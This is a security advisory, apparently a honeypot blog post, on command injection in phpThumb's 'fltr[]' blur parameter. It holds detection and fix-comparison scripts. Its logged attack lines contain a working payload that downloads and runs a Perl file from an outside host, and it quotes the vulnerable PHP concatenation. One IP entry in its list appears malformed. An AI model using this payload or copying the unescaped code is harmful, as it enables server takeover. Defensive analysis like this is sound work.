[Honeypot Alert] phpThumb() 'fltr[]' Parameter Command Injection Detected

The SpiderLabs Research Team has identified active scanning for the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability in our web server honeypot logs. Here is the vulnerability info as described by SecurityFocus:

- Bugtraq ID: 39605
- Class: Input Validation Error
- CVE: CVE-2010-1598
- Remote: Yes
- Local: No
- Published: Apr 21 2010 12:00AM
- Updated: Nov 22 2011 07:39PM
- Credit: M4g
- Vulnerable:
  - phpThumb phpThumb() 1.7.9
  - Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26
  - FLEXIcontent FLEXIcontent 1.5.3c
  - FLEXIcontent FLEXIcontent 1.5.3B

Here are some Apache access_log examples:

```
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
```

We have seen scanning from the following hosts:

```
115.178.22.206
116.12.168.232
161.139.195.191
189.87.233.5
195.248.231.180
200.134.25.51
206.212.253.225
213.195.65.16
217.79.182.38
62.212.67.77
70.169.147.2191.121.137.87
91.121.151.155
91.121.152.105
91.121.160.160
91.121.168.45
91.121.208.199
91.121.22.107
91.121.3.41
91.121.5.211
91.121.90.185
94.23.10.76
94.23.19.182
94.23.196.142
94.23.205.180
94.23.214.101
94.23.216.55
94.23.230.103
94.23.232.190
94.23.244.138
94.23.27.170
94.23.39.16
94.23.42.121
94.23.47.198
94.23.61.47
```
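The log entries above can be triaged automatically. The following detection script is an added example and is not part of the original SpiderLabs post: it parses Apache combined-format lines, splits the query string on `&` the way PHP does, URL-decodes each `fltr[]` value and flags any filter parameter that carries shell metacharacters or a non-numeric `blur` radius. The sample log lines are constructed for the example (the payload download host is the documentation address 198.51.100.7, not the address seen in the honeypot), and the function and regex names are the example's own.

```python
"""Flag phpThumb() fltr[] command-injection attempts in Apache access_log lines."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines modelled on the honeypot entries above; the
# download host 198.51.100.7 is a documentation placeholder, not a real IoC.
SAMPLE_LOG = """\
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%20198.51.100.7/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Dec/2011:11:02:10 +0100] "GET /phpThumb/phpThumb.php?src=images/photo.jpg&w=200&fltr[]=blur|3 HTTP/1.1" 200 9821 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Dec/2011:11:02:11 +0100] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Characters that let a value escape its argument in /bin/sh when concatenated unquoted.
SHELL_META = re.compile(r'[;&|`$<>\n\\]')


def query_params(query):
    """Split a query string the way PHP does (on '&' only) and URL-decode both halves.

    Done by hand rather than with urllib.parse.parse_qsl because older Python
    versions also split on ';', which would hide exactly the character we look for.
    """
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        yield unquote_plus(key), unquote_plus(value)


def analyze_request(target):
    """Return (filter, reason) tuples for suspicious fltr[] values in one request target."""
    if 'phpthumb.php' not in target.lower():
        return []
    findings = []
    for key, value in query_params(urlsplit(target).query):
        if key != 'fltr[]':
            continue
        command, _, parameter = value.partition('|')
        if SHELL_META.search(parameter):
            findings.append((command, 'shell metacharacter in filter parameter'))
        elif command == 'blur' and not re.fullmatch(r'\d*', parameter.strip()):
            # A legitimate blur radius is a small integer; anything else is malformed.
            findings.append((command, 'non-numeric blur radius'))
    return findings


def scan_log(text):
    """Return one alert dict per log line whose phpThumb request looks like an injection attempt."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m.group('target'))
        if findings:
            alerts.append({
                'ip': m.group('ip'),
                'status': int(m.group('status')),
                'reasons': sorted({reason for _, reason in findings}),
            })
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The honeypot answered these requests with 404, so the scanner never reached a phpThumb.php; on a production host the same rule should be paired with the response status, because a 200 for a request that carries both an injected `fltr[]` value and `phpThumbDebug=9` means the script exists and its output was returned to the scanner.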

By appending a semicolon to the "blur" option of the fltr parameter, the attacker is able to execute OS-level commands. Look at the phpthumb.class.php code:

```php
function ImageMagickThumbnailToGD() {
...
    foreach ($this->fltr as $filterkey => $filtercommand) {
        // fltr[]=blur|9 splits into $command = 'blur', $parameter = '9'
        @list($command, $parameter) = explode('|', $filtercommand, 2);
        switch ($command) {
...
            case 'blur':
                if ($this->ImageMagickSwitchAvailable('blur')) {
                    @list($radius) = explode('|', $parameter);
                    $radius = ($radius ? $radius : 1);
                    // user-controlled $radius is concatenated into the shell command line unescaped
                    $commandline .= ' -blur '.$radius;
                    unset($this->fltr[$filterkey]);
                }
                break;
...
    $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
    // the assembled command line is handed to the shell here
    $IMresult = phpthumb_functions::SafeExec($commandline);
    clearstatcache();
    if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
        @unlink($IMtempSourceFilename);
    }
    if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
        $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');
        $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);
...
}
```

The assembled command line is then executed by SafeExec() in phpthumb.functions.php without any input validation of the user-supplied filter data, so the semicolon in the radius field terminates the ImageMagick command and the shell runs whatever follows it. The phpThumb CHANGELOG states the following changes for v1.7.10:

```
v1.7.10 - April 24, 2011
  * ImageMagickVersion() returned unknown-version for versions
    with hyphenated subversion numbers
    (thanks r34wangØuwaterloo*ca)
  * replace all ereg* functions with preg* equivalents for
    PHP v5.3.0+ compatibility
  * Bugfix: security vulnerabilities when used with ImageMagick
```

The updated "blur" code now coerces the radius to an integer clamped to the range 0 to 25 and also passes it through PHP's escapeshellarg() function before it reaches the command line:

```php
case 'blur':
    if ($this->ImageMagickSwitchAvailable('blur')) {
        @list($radius) = explode('|', $parameter);
        // intval() keeps only a leading integer; min/max clamp it to 0..25
        $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
        // escapeshellarg() wraps the value in single quotes as a second layer
        $commandline .= ' -blur '.escapeshellarg($radius);
        $successfullyProcessedFilters[] = $filterkey;
    }
    break;
```
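To make the two layers of the fix concrete, here is an added Python re-implementation of the 1.7.9 and 1.7.10 "blur" handling (it is illustration code, not phpThumb's own). php_intval() and php_empty() approximate PHP's intval() and empty() semantics, shlex.quote() stands in for escapeshellarg(), and the injected radius string is constructed for the example with the payload's download and kill steps replaced by a harmless `id`.

```python
"""Contrast phpThumb 1.7.9's raw radius concatenation with the 1.7.10 fix."""
import re
import shlex

# Constructed radius field of fltr[]=blur|<radius> after URL decoding, shaped like
# the honeypot payload but with the wget/killall/perl steps replaced by `id`.
INJECTED_RADIUS = "9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; id ; "


def php_intval(s):
    """Approximate PHP intval() on a string: the leading decimal integer, else 0."""
    m = re.match(r'\s*[+-]?\d+', s)
    return int(m.group()) if m else 0


def php_empty(s):
    """Approximate PHP empty() on a string: true for '' and for '0'."""
    return s in ('', '0')


def blur_args_vulnerable(parameter):
    """1.7.9 logic: whatever the client sent becomes part of the shell command line."""
    radius = parameter.split('|', 1)[0]
    radius = '1' if php_empty(radius) else radius
    return ' -blur ' + radius


def blur_args_quoted_only(parameter):
    """Quoting alone: the whole value stays one argument, but no range check is applied."""
    radius = parameter.split('|', 1)[0]
    radius = '1' if php_empty(radius) else radius
    return ' -blur ' + shlex.quote(radius)


def blur_args_fixed(parameter):
    """1.7.10 logic: integer-coerced, clamped to 0..25, then shell-quoted."""
    radius = parameter.split('|', 1)[0]
    radius = 1 if php_empty(radius) else min(max(php_intval(radius), 0), 25)
    return ' -blur ' + shlex.quote(str(radius))


def shell_words(args):
    """Words a POSIX shell would split the fragment into (';' appears as its own word here;
    a real shell treats an unquoted ';' as a command separator instead)."""
    return shlex.split(args)


if __name__ == '__main__':
    for name, fn in (('vulnerable', blur_args_vulnerable),
                     ('quoted only', blur_args_quoted_only),
                     ('fixed', blur_args_fixed)):
        print(f'{name:12s} {shell_words(fn(INJECTED_RADIUS))}')
```

Running it shows the unescaped 1.7.9 fragment splitting into eleven shell words with a bare `;` among them, the quoted-only variant collapsing the entire payload into a single harmless argument, and the 1.7.10 logic reducing it to `-blur 9`. The integer clamp matters independently of the quoting: it also stops oversized radii that would make ImageMagick burn CPU on a single request.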
